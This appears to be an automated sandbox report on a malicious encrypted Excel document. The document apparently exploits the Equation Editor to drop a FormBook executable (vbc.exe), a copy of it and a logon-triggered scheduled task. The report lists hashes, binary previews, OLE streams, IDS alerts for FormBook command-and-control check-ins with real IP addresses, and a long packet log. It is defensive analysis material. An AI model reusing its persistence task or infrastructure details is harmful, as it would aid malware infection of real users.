                                                                                                                                                              Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2A0E6BB.emf
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):653280
                                                                                                                                                              Entropy (8bit):2.898618181500054
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3072:K34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:k4UcLe0JOqQQZR8MDdATCR3tS+jqcC
                                                                                                                                                              MD5:AF5EE0EFF2EBE3F015B52F53023B58AA
                                                                                                                                                              SHA1:01F9A3167EA08F5FB9F9D167D0B120581575ABC5
                                                                                                                                                              SHA-256:9C6C18736559802F69925E7E49C71E924A84DA22344B099D84CD39CC6A8D3531
                                                                                                                                                              SHA-512:B2F4E249AFB5A445B1EC743E30DC9217642BE95E19F1CE8602509792D7A8A15B489EC739713ECD355F7A620606EBCCD4A09744E64A04F7EEC6E7605E5FEE6CA9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: ....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................1...1.......1...1..N.S..1...1.......1...1..N.S..1...1. ....y.Q..1...1. .........E..z.Q............_...............................X...%...7...................{ .@................C.a.l.i.b.r...............1.X.....1.D.1..2.P..........1...1..{.P......1...E.dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp4BF0.tmp
                                                                                                                                                              Process:C:\Users\Public\vbc.exe
                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1619
                                                                                                                                                              Entropy (8bit):5.154736959652798
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB2kNtn:cbhZ7ClNQi/rydbz9I3YODOLNdq31n
                                                                                                                                                              MD5:C3BCC181FF0E87324141EC3F488455FC
                                                                                                                                                              SHA1:43B13BE4CF2D7561B78571103BEC5B88056086D1
                                                                                                                                                              SHA-256:21C274F6CE1F83805FAC7EBDE382C1648A17489BBA7B382C5236BDE705099607
                                                                                                                                                              SHA-512:E18EF08195B09EB5B8A99A312EBEB66BF546E3FFBB002F87AF3334B88D4B6B7EB5F7D0FF89636B5B25F835FCC00F4E22482A4BE704A7FBEF5E63C6B4899E16C7
                                                                                                                                                              Malicious:true
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                                                                                                              C:\Users\user\AppData\Roaming\VqdYEvk.exe
                                                                                                                                                              Process:C:\Users\Public\vbc.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1012736
                                                                                                                                                              Entropy (8bit):7.353050185900719
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24576:wm8hzilPQ+ZT1AmUoalioH1Btq9ZaQax:t8lSnZTBv0dHdqmB
                                                                                                                                                              MD5:351B0B74944773C3C36D417EEF151670
                                                                                                                                                              SHA1:4109A31F036EFEF7EA222D25CD0B3E4E0564533B
                                                                                                                                                              SHA-256:3682691140DA912F7A282B23DE9AACCFFA2AD8178665E6A8ACE9D745A8FB8CDE
                                                                                                                                                              SHA-512:E9C85320FC24E77D54C85B49CC73233BD6F1CBD492BFE6D3C7E6BB54743F7B93D796E99784E0B63529DBC7A5C878E35F87AAA370CB40BD99A723A0AE2DABC642
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...bq.`..............0..J...(.......i... ........@.. ....................................@.................................Xi..S.......P$........................................................................... ............... ..H............text....I... ...J.................. ..`.rsrc...P$.......&...L..............@..@.reloc...............r..............@..B.................i......H...................w...8_..p............................................W/it.5.r.!.n.-......t..U......X.bN.%.1;.%...i8....s.6.a...q.I...~c.8 w^...ir.6I,.q..S...w$i.K.:.l......f...i..5)..8AH.Q.=.0[...n..tM).6.6Fjh.d.J......aNg.MO..1Le.{..L...z.....`.9.j..`4}..w[.~.J....O:JE..8+. ...i,~T.X...x..<..m)j.Hp..O.=.$...!.8..|......[......m....v..!.U..+V....r.|..9..X.t...3k..m.....,iV..%...C.3?.I../....ar...}'R......-I..5:./}U.....3Xi~.=.=..1%J...S..L.z...K5.'.+..\...
                                                                                                                                                              C:\Users\user\Desktop\~$Doc_37584567499454.xlsx
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):330
                                                                                                                                                              Entropy (8bit):1.4377382811115937
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                              MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                              Malicious:true
                                                                                                                                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                              C:\Users\Public\vbc.exe
                                                                                                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1012736
                                                                                                                                                              Entropy (8bit):7.353050185900719
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24576:wm8hzilPQ+ZT1AmUoalioH1Btq9ZaQax:t8lSnZTBv0dHdqmB
                                                                                                                                                              MD5:351B0B74944773C3C36D417EEF151670
                                                                                                                                                              SHA1:4109A31F036EFEF7EA222D25CD0B3E4E0564533B
                                                                                                                                                              SHA-256:3682691140DA912F7A282B23DE9AACCFFA2AD8178665E6A8ACE9D745A8FB8CDE
                                                                                                                                                              SHA-512:E9C85320FC24E77D54C85B49CC73233BD6F1CBD492BFE6D3C7E6BB54743F7B93D796E99784E0B63529DBC7A5C878E35F87AAA370CB40BD99A723A0AE2DABC642
                                                                                                                                                              Malicious:true
                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...bq.`..............0..J...(.......i... ........@.. ....................................@.................................Xi..S.......P$........................................................................... ............... ..H............text....I... ...J.................. ..`.rsrc...P$.......&...L..............@..@.reloc...............r..............@..B.................i......H...................w...8_..p............................................W/it.5.r.!.n.-......t..U......X.bN.%.1;.%...i8....s.6.a...q.I...~c.8 w^...ir.6I,.q..S...w$i.K.:.l......f...i..5)..8AH.Q.=.0[...n..tM).6.6Fjh.d.J......aNg.MO..1Le.{..L...z.....`.9.j..`4}..w[.~.J....O:JE..8+. ...i,~T.X...x..<..m)j.Hp..O.=.$...!.8..|......[......m....v..!.U..+V....r.|..9..X.t...3k..m.....,iV..%...C.3?.I../....ar...}'R......-I..5:./}U.....3Xi~.=.=..1%J...S..L.z...K5.'.+..\...

                                                                                                                                                              Static File Info

                                                                                                                                                              General

                                                                                                                                                              File type:CDFV2 Encrypted
                                                                                                                                                              Entropy (8bit):7.996628645115662
                                                                                                                                                              TrID:
                                                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                              File name:Doc_37584567499454.xlsx
                                                                                                                                                              File size:2223104
                                                                                                                                                              MD5:3cee064f8475688e425d7ade676a1598
                                                                                                                                                              SHA1:bad71a575189539a0c57a78cdd24524fe8a2a845
                                                                                                                                                              SHA256:efcc32d3d6d53019b57fbbf107ab622a6374c8d0816c05d1c7687b57c97152e8
                                                                                                                                                              SHA512:34847632a87c8ff2aaeda3603a5dd342f0f6bc1b9fd9dbc49d550beca47d78a07b57208bcc1a5f9f5563399b3508c6b0a00f51f169e279848203097bf9ef490c
                                                                                                                                                              SSDEEP:49152:8ut8Dylh6t/Tvwlu37pSegKNwzE9qPj8DP5MhFrOYtU0:8oncRwlu37pSegOz7OjrO0z
                                                                                                                                                              File Content Preview:........................>..................."...................................................................................|.......~...............z.......|.......~...............z.......|.......~......................................................

                                                                                                                                                              File Icon

                                                                                                                                                              Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                              Static OLE Info

                                                                                                                                                              General

                                                                                                                                                              Document Type:OLE
                                                                                                                                                              Number of OLE Files:1

                                                                                                                                                              OLE File "Doc_37584567499454.xlsx"

                                                                                                                                                              Indicators

                                                                                                                                                              Has Summary Info:False
                                                                                                                                                              Application Name:unknown
                                                                                                                                                              Encrypted Document:True
                                                                                                                                                              Contains Word Document Stream:False
                                                                                                                                                              Contains Workbook/Book Stream:False
                                                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                                                              Contains Visio Document Stream:False
                                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                                              Flash Objects Count:
                                                                                                                                                              Contains VBA Macros:False

                                                                                                                                                              Streams

                                                                                                                                                              Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                              General
                                                                                                                                                              Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:64
                                                                                                                                                              Entropy:2.73637206947
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                              Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                              Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                              General
                                                                                                                                                              Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:112
                                                                                                                                                              Entropy:2.7597816111
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                              Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                              Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                              General
                                                                                                                                                              Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:200
                                                                                                                                                              Entropy:3.13335930328
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                              Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                              Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                              General
                                                                                                                                                              Stream Path:\x6DataSpaces/Version
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:76
                                                                                                                                                              Entropy:2.79079600998
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                              Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                              Stream Path: EncryptedPackage, File Type: data, Stream Size: 2202008
                                                                                                                                                              General
                                                                                                                                                              Stream Path:EncryptedPackage
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:2202008
                                                                                                                                                              Entropy:7.99991238267
                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                              Data ASCII:. . ! . . . . . ^ ! z r l & . . . G . . . H . . . . W . | . . . & . F , . , p . . . . . h 3 . @ . . . B . . . . . A . < : r . 1 ^ . . . . . Z . u - . . . n , . u . W . _ . . x u - . . . n , . u . W . _ . . x u - . . . n , . u . W . _ . . x u - . . . n , . u . W . _ . . x u - . . . n , . u . W . _ . . x u - . . . n , . u . W . _ . . x u - . . . n , . u . W . _ . . x u - . . . n , . u . W . _ . . x u - . . . n , . u . W . _ . . x u - . . . n , . u . W . _ . . x u - . . . n , . u . W . _ . . x u - . . . n , .
                                                                                                                                                              Data Raw:8a 99 21 00 00 00 00 00 5e 21 7a 72 6c 26 ad df da 47 9e 90 a0 48 b3 b4 a4 af 57 cc 7c df 84 90 26 cd 46 2c 7f 2c 70 1b 9a d5 b0 05 68 33 aa 40 d0 ac e0 42 b9 08 f0 9c a9 41 b3 3c 3a 72 1f 31 5e 9d a9 ec 1c 97 5a d1 75 2d b5 9a 1e 6e 2c 99 75 e6 57 0b 5f e9 f6 78 75 2d b5 9a 1e 6e 2c 99 75 e6 57 0b 5f e9 f6 78 75 2d b5 9a 1e 6e 2c 99 75 e6 57 0b 5f e9 f6 78 75 2d b5 9a 1e 6e 2c 99
                                                                                                                                                              Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                              General
                                                                                                                                                              Stream Path:EncryptionInfo
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:224
                                                                                                                                                              Entropy:4.54648387482
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . 4 . . . . . K O ) u O . Y 3 { r . . . . . . 1 . . F R . . * . . . . . . = < . . p . . % . O . V . . . X . O . . . . . h . . . } . U ,
                                                                                                                                                              Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                              Network Behavior

                                                                                                                                                              Snort IDS Alerts

                                                                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                              01/27/21-19:56:46.756224TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916780192.168.2.22185.26.106.165
                                                                                                                                                              01/27/21-19:57:54.953264TCP1201ATTACK-RESPONSES 403 Forbidden804916834.102.136.180192.168.2.22
                                                                                                                                                              01/27/21-19:58:00.407740TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.2252.209.107.24
                                                                                                                                                              01/27/21-19:58:00.407740TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.2252.209.107.24
                                                                                                                                                              01/27/21-19:58:00.407740TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.2252.209.107.24
                                                                                                                                                              01/27/21-19:58:06.025470TCP1201ATTACK-RESPONSES 403 Forbidden8049170100.24.208.97192.168.2.22
                                                                                                                                                              01/27/21-19:58:11.328413TCP1201ATTACK-RESPONSES 403 Forbidden804917134.102.136.180192.168.2.22
                                                                                                                                                              01/27/21-19:58:23.310626TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917380192.168.2.22198.185.159.144
                                                                                                                                                              01/27/21-19:58:23.310626TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917380192.168.2.22198.185.159.144
                                                                                                                                                              01/27/21-19:58:23.310626TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917380192.168.2.22198.185.159.144

                                                                                                                                                              Network Port Distribution

                                                                                                                                                              TCP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Jan 27, 2021 19:56:46.702471018 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.755722046 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.755825043 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.756223917 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.809475899 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.810101032 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.810156107 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.810183048 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.810216904 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.810246944 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.810285091 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.810302019 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.810327053 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.810358047 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.810395956 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.810429096 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.810437918 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.810452938 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.810477018 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.810503006 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.810535908 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.810561895 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.810585022 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.810597897 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.810631990 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.815437078 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.865761995 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.865849018 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.865909100 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.865950108 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.865977049 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.865995884 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.866013050 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.866061926 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.866101980 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.866125107 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.866177082 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.866205931 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.866259098 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.866276979 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.866314888 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.866334915 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.866372108 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.866394997 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.866436005 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.866458893 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.866504908 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.866538048 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.866556883 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.866590023 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.866637945 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.866650105 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.866688013 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.866704941 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.866748095 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.866759062 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.866796017 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.866811037 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.866858959 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.866880894 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.866921902 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.866939068 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.866976976 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.866991997 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.867059946 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.867645979 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.920136929 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920166969 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920178890 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920191050 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920207977 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920224905 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920242071 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920257092 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920275927 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920293093 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920308113 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920326948 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.920341969 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920356989 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920372963 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920381069 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.920396090 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920408010 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.920423031 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920443058 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920454979 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.920470953 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920490980 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920496941 CET4916780192.168.2.22185.26.106.165
